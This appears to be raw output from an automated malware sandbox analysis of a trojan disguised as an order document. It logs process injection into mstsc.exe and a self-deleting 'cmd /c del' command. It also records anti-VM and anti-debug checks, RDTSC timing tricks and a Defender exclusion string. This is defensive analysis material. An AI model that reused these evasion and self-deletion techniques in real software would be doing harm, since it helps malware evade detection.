          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Order 122001-220 guanzo.exe | Virustotal: Detection: 62%
          Source: Order 122001-220 guanzo.exe | Metadefender: Detection: 32%
          Source: Order 122001-220 guanzo.exe | ReversingLabs: Detection: 65%
          Source: unknown | Process created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Process created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Process created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exe
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Order 122001-220 guanzo.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Order 122001-220 guanzo.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP | source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb | source: Order 122001-220 guanzo.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL | source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb | source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb | source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_00414DB2 push ebx; retf 1_2_00414DBB
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_00416ED7 push es; ret 1_2_00416ED8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0193D0D1 push ecx; ret 1_2_0193D0E4
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04B2D0D1 push ecx; ret 3_2_04B2D0E4
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0085B3B5 push eax; ret 3_2_0085B408
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0085B402 push eax; ret 3_2_0085B408
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0085B40B push eax; ret 3_2_0085B472
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0085B46C push eax; ret 3_2_0085B472
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00854DB2 push ebx; retf 3_2_00854DBB
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00856ED7 push es; ret 3_2_00856ED8
          Source: initial sample | Static PE information: section name: .text entropy: 7.76742936293
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Order 122001-220 guanzo.exe PID: 864, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 00000000008485E4 second address: 00000000008485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 000000000084897E second address: 0000000000848984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe TID: 4660 | Thread sleep time: -101967s >= -30000s
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe TID: 4944 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5588 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 6076 | Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Thread delayed: delay time: 101967
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmp | Binary or memory string: 6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&^
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.693144077.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.685203487.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000002.939807233.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: explorer.exe, 00000002.00000000.693679167.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_00409B20 LdrLoadDll, 1_2_00409B20
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01912990 mov eax, dword ptr fs:[00000030h] 1_2_01912990
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h] 1_2_018E2D8A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0191FD9B mov eax, dword ptr fs:[00000030h] 1_2_0191FD9B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01912581 mov eax, dword ptr fs:[00000030h] 1_2_01912581
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0190C182 mov eax, dword ptr fs:[00000030h] 1_2_0190C182
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0191A185 mov eax, dword ptr fs:[00000030h] 1_2_0191A185
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01911DB5 mov eax, dword ptr fs:[00000030h] 1_2_01911DB5
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019651BE mov eax, dword ptr fs:[00000030h] 1_2_019651BE
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019135A1 mov eax, dword ptr fs:[00000030h] 1_2_019135A1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019669A6 mov eax, dword ptr fs:[00000030h] 1_2_019669A6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019161A0 mov eax, dword ptr fs:[00000030h] 1_2_019161A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019B05AC mov eax, dword ptr fs:[00000030h] 1_2_019B05AC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h] 1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01966DC9 mov ecx, dword ptr fs:[00000030h] 1_2_01966DC9
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01998DF1 mov eax, dword ptr fs:[00000030h] 1_2_01998DF1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018EB1E1 mov eax, dword ptr fs:[00000030h] 1_2_018EB1E1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018FD5E0 mov eax, dword ptr fs:[00000030h] 1_2_018FD5E0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h] 1_2_019AFDE2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019741E8 mov eax, dword ptr fs:[00000030h] 1_2_019741E8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018E9100 mov eax, dword ptr fs:[00000030h] 1_2_018E9100
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0196A537 mov eax, dword ptr fs:[00000030h] 1_2_0196A537
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019AE539 mov eax, dword ptr fs:[00000030h] 1_2_019AE539
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01914D3B mov eax, dword ptr fs:[00000030h] 1_2_01914D3B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0191513A mov eax, dword ptr fs:[00000030h] 1_2_0191513A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019B8D34 mov eax, dword ptr fs:[00000030h] 1_2_019B8D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01904120 mov eax, dword ptr fs:[00000030h] 1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01904120 mov ecx, dword ptr fs:[00000030h] 1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h] 1_2_018F3D34
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018EAD30 mov eax, dword ptr fs:[00000030h] 1_2_018EAD30
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01907D50 mov eax, dword ptr fs:[00000030h] 1_2_01907D50
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01923D43 mov eax, dword ptr fs:[00000030h] 1_2_01923D43
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0190B944 mov eax, dword ptr fs:[00000030h] 1_2_0190B944
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01963540 mov eax, dword ptr fs:[00000030h] 1_2_01963540
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0190C577 mov eax, dword ptr fs:[00000030h] 1_2_0190C577
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018EC962 mov eax, dword ptr fs:[00000030h] 1_2_018EC962
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018EB171 mov eax, dword ptr fs:[00000030h] 1_2_018EB171
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018E9080 mov eax, dword ptr fs:[00000030h] 1_2_018E9080
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_01963884 mov eax, dword ptr fs:[00000030h] 1_2_01963884
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_018F849B mov eax, dword ptr fs:[00000030h] 1_2_018F849B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0191F0BF mov ecx, dword ptr fs:[00000030h] 1_2_0191F0BF
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0191F0BF mov eax, dword ptr fs:[00000030h] 1_2_0191F0BF
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019120A0 mov eax, dword ptr fs:[00000030h] 1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_019290AF mov eax, dword ptr fs:[00000030h] 1_2_019290AF
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0197B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe | Code function: 1_2_0197B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_0197B8D0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8CD6 mov eax, dword ptr fs:[00000030h]1_2_019B8CD6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A14FB mov eax, dword ptr fs:[00000030h]1_2_019A14FB
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E58EC mov eax, dword ptr fs:[00000030h]1_2_018E58EC
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]1_2_01966CF0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]1_2_01966CF0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966CF0 mov eax, dword ptr fs:[00000030h]1_2_01966CF0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]1_2_01967016
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]1_2_01967016
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967016 mov eax, dword ptr fs:[00000030h]1_2_01967016
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B4015 mov eax, dword ptr fs:[00000030h]1_2_019B4015
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B4015 mov eax, dword ptr fs:[00000030h]1_2_019B4015
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]1_2_019B740D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]1_2_019B740D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B740D mov eax, dword ptr fs:[00000030h]1_2_019B740D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1C06 mov eax, dword ptr fs:[00000030h]1_2_019A1C06
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966C0A mov eax, dword ptr fs:[00000030h]1_2_01966C0A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB02A mov eax, dword ptr fs:[00000030h]1_2_018FB02A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191002D mov eax, dword ptr fs:[00000030h]1_2_0191002D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191BC2C mov eax, dword ptr fs:[00000030h]1_2_0191BC2C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01900050 mov eax, dword ptr fs:[00000030h]1_2_01900050
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01900050 mov eax, dword ptr fs:[00000030h]1_2_01900050
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197C450 mov eax, dword ptr fs:[00000030h]1_2_0197C450
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0197C450 mov eax, dword ptr fs:[00000030h]1_2_0197C450
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A44B mov eax, dword ptr fs:[00000030h]1_2_0191A44B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A2073 mov eax, dword ptr fs:[00000030h]1_2_019A2073
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B1074 mov eax, dword ptr fs:[00000030h]1_2_019B1074
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190746D mov eax, dword ptr fs:[00000030h]1_2_0190746D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F1B8F mov eax, dword ptr fs:[00000030h]1_2_018F1B8F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F1B8F mov eax, dword ptr fs:[00000030h]1_2_018F1B8F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191B390 mov eax, dword ptr fs:[00000030h]1_2_0191B390
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]1_2_01967794
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]1_2_01967794
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01967794 mov eax, dword ptr fs:[00000030h]1_2_01967794
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912397 mov eax, dword ptr fs:[00000030h]1_2_01912397
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A138A mov eax, dword ptr fs:[00000030h]1_2_019A138A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199D380 mov ecx, dword ptr fs:[00000030h]1_2_0199D380
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F8794 mov eax, dword ptr fs:[00000030h]1_2_018F8794
